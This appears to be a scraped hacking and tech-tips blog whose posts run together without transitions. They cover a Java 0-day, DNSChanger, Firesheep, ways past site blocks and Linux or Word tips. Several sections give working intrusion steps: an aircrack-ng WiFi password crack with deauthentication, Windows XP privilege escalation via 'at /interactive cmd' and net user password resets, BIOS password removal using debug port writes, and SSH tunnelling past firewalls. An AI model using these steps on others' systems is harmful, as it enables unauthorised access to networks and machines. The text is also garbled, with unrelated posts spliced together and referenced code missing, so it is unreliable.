New Java 0-Day Exploit Spotted in the Wild

A new Java 0-day vulnerability has been discovered, and is already being exploited in the wild. Currently, disabling the plugin is the only way to protect your computer.

Description:
The MBeanInstantiator in Oracle Java Runtime Environment (JRE) 1.7 in Java 7 Update 10 and earlier allows remote attackers to execute arbitrary code via vectors related to unspecified classes that allow access to the class loader, as exploited in the wild in January 2013, as demonstrated by Blackhole and Nuclear Pack, and a different vulnerability than CVE-2012-4681.

Impact:
By convincing a user to visit a specially crafted HTML document, a remote attacker may be able to execute arbitrary code on a vulnerable system.

This actual vulnerability was later confirmed by security firm AlienVault Labs. With Kafeine’s help, the company reproduced the exploit on a new, fully-patched installation of Java, and used a malicious Java applet to remotely execute the Calculator application on Windows XP as shown in the below screen-shot:

How DNSChanger Malware Works

DNSChanger is malicious software (malware) that changes a user’s Domain Name System (DNS) settings, in order to divert traffic to unsolicited and potentially illegal sites.

Beginning in 2007, the cyber ring responsible for DNSChanger operated under the company name “Rove Digital” and used the malware to manipulate users’ Web activity by redirecting unsuspecting users to rogue DNS servers hosted in Estonia, New York, and Chicago. In some cases, the malware had the additional effect of preventing users’ anti-virus software and operating systems from updating, thereby exposing infected machines to even more malicious software.

FBI has since seized the rogue DNS servers and the botnet’s command-and-control (C&C) servers as part of “Operation Ghost Click” and the servers are now under their control. To assist victims affected by the DNSChanger, the FBI obtained a court order authorising the Internet Systems Consortium (ISC) to deploy and maintain temporary legitimate DNS servers, replacing the Rove Digital malicious network. As mentioned earlier, this is by no means a permanent solution and does not remove malware from infected systems; it just provides additional time for victims to clean affected computers and restore their normal DNS settings. According to the court order-which expired on 9 July 2012-the clean DNS servers will be turned off and computers still infected by DNSChanger malware may lose Internet connectivity.

To put this into perspective, DNS is an Internet service that converts user-friendly domain names into the numerical IP addresses that computers use to talk to each other. When you enter a domain name into your Web browser address bar, your computer contacts DNS servers to determine the IP address for the website you are intending to visit. Your computer then uses this IP address to locate and connect to the website. DNS servers are operated by your Internet service provider (ISP) and are included in your computer’s network configuration.

With the ability to change a computer’s DNS settings, malware authors can control what websites a computer connects to on the Internet and can force a compromised computer to connect to a fraudulent website or redirect the computer away from an intended website. To do that, a malware author needs to compromise a computer with malicious code, which in this case is DNSChanger. Once the computer is compromised, the malware modifies the DNS settings from the ISP’s legitimate DNS server’s address to the rogue DNS server’s address, in this case, advertisement websites.

A task force has been created, called the DNSChanger Working Group (DCWG), to help people determine if their computers have been compromised by this threat and to also help them remove the threat.

Access Banned Torrent and Video Sites in India

Some of the ISPs in India have already started blocking torrent websites (The PirateBay, Torrentz, etc.) as well as some legal video sharing websites (like Vimeo, DailyMotion). Nowadays, when someone tries to access these websites, he/she may receive a rather annoying message:

“Access to this site has been blocked as per Court Orders“

Currently, two of the Indian ISPs – namely Reliance and Airtel – have blocked specific websites. The reason for blocking is yet unclear but the citing of a Court order in the display message gives us a clue. The US Government has already blocked websites in the past on grounds of copyright infringement and it is certain that other countries have also started to follow suit. Torrents have regularly provided users access to copyrighted content worldwide; particularly new movie releases which could be downloaded through torrents.

However, websites like Vimeo and DailyMotion are legal video sharing websites like Youtube and the reason is still unclear as to why these websites have been blocked as per “Court Orders”. In the coming days, we might also start seeing other service providers blocking number of websites on Governmental issues.

There is, however, a way users can still access these blocked websites legally without using a proxy. The trick lies in the protocol used for accessing the website. The sites being blocked in India are generally done so by using filters through the network that prevent the sites from opening. More often, these filters generally work on normal channels and don’t block secured websites.

You can access the Secured Version of the blocked websites using “https” instead of “http” in the address bar. When you open the blocked site with “https”, the website opens without any errors and you get a fully functional website.

Most people try to access these websites via Proxy; but using a proxy has its own disadvantages. The proxy network that a person is using maybe insecure. Moreover, proxys slow down network access speeds considerably. This is because all requests are channeled through the proxy server which handles a large number of clients, which causes slow response times.

Using https does not need a proxy and sites can be opened directly and response times are also quick as it is not channeled through any public server.

Now here are the steps to attack and get wifi password

Open ur 1st konsole and type in

airmon-ng (press enter)

airmon-ng start wlan0 (0 is zero) (press enter)

airodump-ng mon0 (0 is zero)

You can see bssid and stations (know as client mac)

now press ctrl+c for break

now copy the bssid and station into the notepad

after copying it type this command in 1st konsole

airodump-ng -w capture --bssid (paste the bssid u copied) -c (channel no.) mon0 (0 is zero)

after the packets has been sent to around 10,000 or 20,000

most imp part we have to do handshake with wifi :: for handshake

open 2nd console type in

aireplay-ng --deauth 1 -a (paste the bssid) -c (paste the station) mon0

a handshake will be shown on 1st konsole

now go back to the 1st knosole

press ctrl+c

then type

aircrak-ng capture -01.cap -w ./wordlist.lst (press enter)

and vollllaaaa here we go we have got the password of the wifi

How it work:- During Xp installation time if we do not set password to administrator account than this account remain in existence without any password.So if we use Administrator as username than it will direct login to windows without asking any password.

2.Hack Windows Xp using interactive command(By task scheduler)

This method is also effective but you need to have a loged in account with admin privileged.
Steps are follow.
(i)First run command prompt(cmd)
(ii)Type the command at 3:00 /interactive cmd

The time shown in above code must be few minutes after your current time.For example if your clock showing current time as 3:00 AM than you enter 3:02.If its showing 1:00 PM than you can enter 13:03 in above code.
Now hit enter.Wait for some time(until system time reach to time set by you).After that a new window will appear.

(iii)Now close the previous cmd window and open task manager.Kill or end the process explorer.exe from running processes in task manager.

(iv)Now go to the new cmd window(which is just opened) and type command explorer.A new explorer will open but you have a administrator privilege.You can access every thing through this account.

3.Change Administrator Password using net user command

You can change the password of any user in windows by using net user command.

Steps:-

1.Go to cmd(you must have administrative privilege for doing this)

2.type command net user USER_NAME PASSWORD and hit enter,

3.Where username is username of account whose password you want to change.

4.After this the password of the account will be changed.

A group of researchers at Georgia Tech have shown how they have been able to use the accelerometer of an iPhone to pick up what is being typed on a pc keyboard within the range of the iPhone. So in actuality, the cell phone spyware can also work as a keystroke logger if so wished to.
This sounds much like an espionage movie where the hero or heroine uses their special training to rewire ordinary electronic devices nearby and turn them into special spy weapons. But this time the movie is your ordinary life and the spying tools are there for the taking by anyone who knows how.

Possible but probable

So now we know that things like these don’t just happen in movies but there is a very real possibility that they can happen in our own lives. Just like malware developers can infiltrate our iOS systems and plant secret microphones in our homes to catch our conversations, smartphones can be used to monitor what we are typing on our computers. The possibility has been established but exactly how easy is this to do?

Well yes, a research team at Georgia Tech did it but does that mean its child’s play and anyone can do it? Not yet at least. The researchers say that it isn’t as reliable as it should be. But also depends on the phone being used. The more advanced the cell phone (for instance in this case an iPhone 4 is better than an iPhone 3GS) the better quality feedback one would get. However, most new cell phones are sophisticated enough to be able to perform this kind of surveillance with a good 80% accuracy.

Real World Application

When it comes to spying and hacking in the real world, an 80% accuracy rate is not much to go by. Especially since we know that the Georgia Tech researchers based their keyboard typing assessment on lexical probability matching. This means that whatever may not be present in a dictionary format would be unreadable for the iPhone spyware to conceive. And since most users have passwords which are strings of letters and number (at least that is what is strongly preached by every anti-spyware and security organization), a users password is unlikely to be picked up by this sort of a spyware app. If your password is safe chances are that a lot of your personal information is safe as well as that is the main target of hackers.

Plus with this kind of a word match technique there is a lot of room for interference and misinformation to be spread. One wrong word can change the entire scenario. Moreover, the key is that the iPhone be kept near the keyboard. By simply introducing distance between the device and your computer, users would be safe from any real harm. So currently, this is an application which still has to have its glitches worked out before it can leave the world of the cell phone and enter the computer.

1. First you have to download a software PUTTY(click here to download).

2.A SSH account there are lots free ssh services providers trygoogling them.

3.After u download open putty now enter the host name as SSH account which we created earlier and enter the port as 22

4. Now go To SSH options and open tunnels now Change Source port to 8080 and click Dynamic. and finally click open

5. Now login with your details .Now we will configure Mozilla firefox to use SSH connection.

6. Now open Firefox and Go to the “Tools” menu and then Options and Go to the “Advanced” button, the “Network” tab, and then click “Settings

7. In the connection settings enter “localhost” as the “Socks Host and your port number, such as “1080″ into the “Port:” field .thats it now all connections are encrypted thus bypassing firewall or proxy.

Warm up your cable and DSL modems, they’re about to get busy. The Windows 8 Consumer Preview (read: beta) is ready for the general public to download and install. The Consumer Preview is definitely not a fully complete and tested copy of Windows 8, so make sure you don’t do anything crazy like wipe out your existing Windows installation or run it on a machine you use for mission-critical work.

There's a setup program, or direct ISO files for 32-bit and 64-bit versions of the OS. Most modern PCs should probably grab the 64-bit version. How to Break a BIOS Password(for laptop or pc)

Methods of breaking password for Desktop PC and for laptop is quite different. We would explaineach.
Break BIOS Passwordfor Desktop:
If it's a desktop PC, erasing the cmos memory will usually clear it.

Steps:
1. Power off the computer and make sure that it is unplugged.
2. Open up your computer case. You need physical access to themotherboard to complete thisprocedure.
3. Find a circular, (mostly) silver metallic object on the motherboard. This is the CMOS battery.
4. CAREFULLY remove the CMOS battery and leave it out for about 120- 180 seconds. This will flush the CMOS memory which stores the BIOS password and all other configuration. (See Warnings)
5. Set the battery back into place and power on the computer.
6. The computer should then warn you that the CMOS configuration could not be found. You can either reconfigure it yourself or restore defaults. Restoring the default configuration should befine.
7. You will notice that the BIOS password has been cleared and you can boot without it. You mayreset the BIOS password to something else bygoing into the BIOS configuration and setting a new User Password.
Alternate Methos: (More Dificult)
Remove a jumper: There's a jumper on your motherboard that you'll need to identify and remove. Most motherboards make your job easier by actually labeling the correct jumper as"BIOS config" or something similar. (it looks like a small plastic thingy on 2 pins with 1 pin beside it, within a 1" of the battery). If you're having trouble looking for it, look in the motherboard manual.After you have found it, carefuly pull straight up on it, and place it on the 2-3 pins(it was on the 1-2 pins). With the battery removed and the jumper moved, turn the computer on, and check to see if you can get into the bios. If you are able to, turn the computer off, put the jumper back on pins 1-2, and put the battery back in. Lastly put the case together and you are done.
Note: Don't forget to configure the BIOS (if you know how) after this process. If you you don't know how, just hold the "delete" button when starting your PC and when the blue screen appears, find the load safe defaults settings and press:

*. F10 button

Remember that laptops can be trickier, especially if it's a newer model. If it has a security chip on the motherboard forget about it. You either have to physically remove the chip or contact the mfg for the "master" password. If you can boot up off of a cd or floppy try any of these methods:
1. Create a Win98SE bootable media "or anything that lets you boot into MS-DOS" and boot off of it.
2. When the A:\> prompt appearstype debug and press enter.
3. You will then only see a "-".
4. Type o 70 2E "include the spaces" and press Enter.
5. Type o 71 ff "include the spaces" and press Enter.
6. Type q and press Enter.

read and write windows partitions from linux

First of all windows uses FAT32 and NTFS file systems. FAT stands for File Allocation Table. Actually it is a table of information about the hard disk blocks. But the size of any table in computers can not be unlimited. With FAT32 users can not store files larger than 2GB. This cannot change because that's the way the system was designed. You can read more about FAT from wikipedia here.
Now let's come to the point. Linux can read ntfs partitions but cannot write them. The solution is not that easy as Read and Write Linux Partitions From Windows.
First you will need to download the ntfs-3g from it's homepage here.
After downloading ntfs-3g you follow the well known procedure of configure , make , make install . If compile fails you probably don't have FUSE (Filesystem in USErspace) installed or you have an old version. FUSE can be downloaded for it's homepage here. You can follow the previous procedure to install it. If you are with Gentoo you can install ntfs3g and FUSE with these simple commands:

The two first commands write to the file specified and the third download and install ntfs3g and FUSE.

1. ntfs-3g /dev/hda3 /mnt/windows -o uid=xxxx, gid=yyyy

This command will mount the hda3 partition to the directory windows and give owner rights to user with id xxxx and the group with id yyyy.
Alternately you can edit fstab for autostart. The line you must enter in fstab to have the above command autostarted is:


1. /dev/hda3 /mnt/windows ntfs-3g uid=xxxx,gid=yyyy 0 0

Lastly if we want users without root rights to be able to execute ntfs-3g we use the chmod command. e.g. chmod xxxx /usr/bin/ntfs-3g

microsoft word 2003 does not print page border

As the title says today I had a problem with Microsoft word. The page border wasn't printed correctly. Here are the steps to correct it(At least worked for me)
Go to:
- File menu
- Page Setup...
- Select the tab Paper
- Down the Paper Size select Custom Size
- and set Width = 21cm and height = 29cm
- Down to Preview select Apply to Whole Document
and click ok

That worked for me, the page border was printed correctly. I hope this work for you too.

suse linux view cpu speed and hard disk/cpu temperature

I have a laptop which sometime goes really hot and I wanted a simple way to be able to view CPU and Hard disk temperature. I' m on SUSE 10.3 and I tried installing LM-sensors but no sensors were detected. After a very little search I found that you can view the CPU speed by using the cpufrequtils so I installed the package using Yast and executed cpufreq-info.
Here is the output:

I was a little excited but I wanted to view the CPU and the hard disk temperature too.
I found that I could see CPU temperature with the command:


1.  cat /proc/acpi/thermal_zone/THRM/temperature

and the hard disk temperature (and some other stuff if you don't use grep) with


1.  smartctl -d ata -A /dev/sda3 | grep -i temperature

where sda3 is my hard disk partition where linux are installed but actually it doesn't matter. ( I think :-P)

Now we know the commands and we have the tools we need.
But hold on a second, Can't we make it better?
Of course we can, we are talking about computers here!
So I wrote this simple shell script

How can I use my Gmail space to save any file I want?
The answer is very very simple and exciting!!!!
Download and install GMail Drive Shell Extension
After installing open My Computer folder and you will see another drive appear named GMail Drive as shown in the image below.
You can use it as a normal drive (like C:\)!

Double click to open and you will get a window telling you to login.
Fill in your google account user name and password and click OK.

After this you will see a new window like the one in the picture below and then an opened window where you can paste any files you want.

If you use it you will notice that you get a new mail in your inbox for every file you paste.

If you don't like it there is a solution.

Go to your gmail and click Settings (up right)
Go to the tab Filters and select Create a new filter
To the Subject write GMAILFS (leave others blank)
and click Next Step >>
Tick Skip the Inbox (Archive it) and Mark as read (and any other you want)
If you want to add a label (I suggest you do)
select Apply the label: Choose Label... and from the drop down list
select a label you already have or New Label... and in the pop -up window enter the label you want(e.g. my_files)

Finally click Create Filter

If you done the above steps right you won't get a new mail every time you add a new file to your GMail Drive!
You can see these new mails in the folder All Mail and also in the folder Starred if you selected Star it before.

Also GMail Drive Shell Extension bypasses the limitation of storing .exe files or other formats by renaming the file as filename.exe_renamed
This don't affect you in any way because you can see/execute it normally in/from your new drive.

Enjoy your new Drive and also keep in mind that what you're doing may violate Gmail's TOS, so you may want to register another account...

Today I realized that it will be better to have line numbers shown with the parts of code I publish into this blog.
I tried with google but didn't find any "easy" way to do it.
So I figured out my way which I am going to describe here!
First of all I wanted to show line numbers for the code but I also wanted the visitors to be able to copy the code without the line numbers.

As I'm using the <pre> tag to show my code I wrote a JavaScript function which will get the pre tags and change their innerHtml.

Let's explain the code:
Line7: Check if browser is Internet Explorer
Line9: Get all the pre elements
Line13: Get the html inside the pre tag
Line14: Replace all the spaces with the sequence " "
Line14: Remove the first <br> from the inner Html
Line15-18: How many lines are in the pre tag (depending on browser)
Line21-22: Html code to create a table , row and a cell with background colour = #d4d0c8 (You can change it if you don't like it)
Lines23-25: Fill the cell with the numbers 1 till the lines of pre tag
Line26-28: Add the old content in the next cell
Line30: Set the new html code as the code for the tag element

Notice that you can copy the code without the line numbers if you want. You just copy the right cell of the table! That's something I really wanted. Visitors can copy only the code!

After that I had to link the code with my template.
How?
Log in to Blogger - Select Layout and then Edit HTML
Now add before the </head> the line:
<script src='http://..../showLineNumbers.js' type='text/javascript'/>

and now we have to call the function in the showLineNumbers.js so we add before the </body>

</script>

Preview template and if it's ok save it. Remember to backup your template before changes.

Tip1:
If you use pre tag for other purposes too or you use other tag you defined in a css file for your code
then edit the javascript function for your needs.

For example if you defined the tag code in your css file and use it inside a pre block then you add
these lines to the function at line 12:

With this post I will show you how to create a cool button to use in your webpages or anywhere you want for free!
In my I case I wanted to add a download button for the code parts I post here.

Step1:
Go to Cool Text Graphics Generator
And go down to Choose a Button Design and select the button you like

Step2:
Write your text and select the disired fonts and colours.
In my case the text was "DOWNLOAD".
Filled the colours and selected Text Offest Y = -5 (move the text 5 pixels up from the center)
For Mouse over I selected Glow.
Now hit the button "Render Button"
Here you see two images. One for the normal button and one for the mouseover trigger.
Just save/download the first image. e.g. mybutton.png
Mine is

Step3:
Click "Edit this logo" and change Text Offest Y to 0 and click again "Render Button"
Now save the second image. e.g. mybuttonMouseOver.png
Mine is

Step4:
Now we have the two images we need. We just have to upload them somewhere.
There are a lot of free web host and space providers for your files. Just choose who you like.
Let's say you uploaded the two pictures to the address http://myurl/

To display the picture you write the following html:

Firesheep is a Firefox extension used to hijack web sessions usuall used over WiFi networks. Firesheep doesn’t steal usernames and passwords. Instead it copies session cookies used on authentication websites. These are then used to impersonate the hijack connection.

When logging into a website you usually start by submitting your username and password. The server then checks to see if an account matching this information exists and if so, replies back to you with a “cookie” which is used by your browser for all subsequent requests.

It’s extremely common for websites to protect your password by encrypting the initial login, but surprisingly uncommon for websites to encrypt everything else. This leaves the cookie (and the user) vulnerable. HTTP session hijacking (sometimes called “sidejacking”) is when an attacker gets a hold of a user’s cookie, allowing them to do anything the user can do on a particular website. On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy.

Facebook is constantly rolling out new “privacy” features in an endless attempt to quell the screams of unhappy users, but what’s the point when someone can just take over an account entirely?
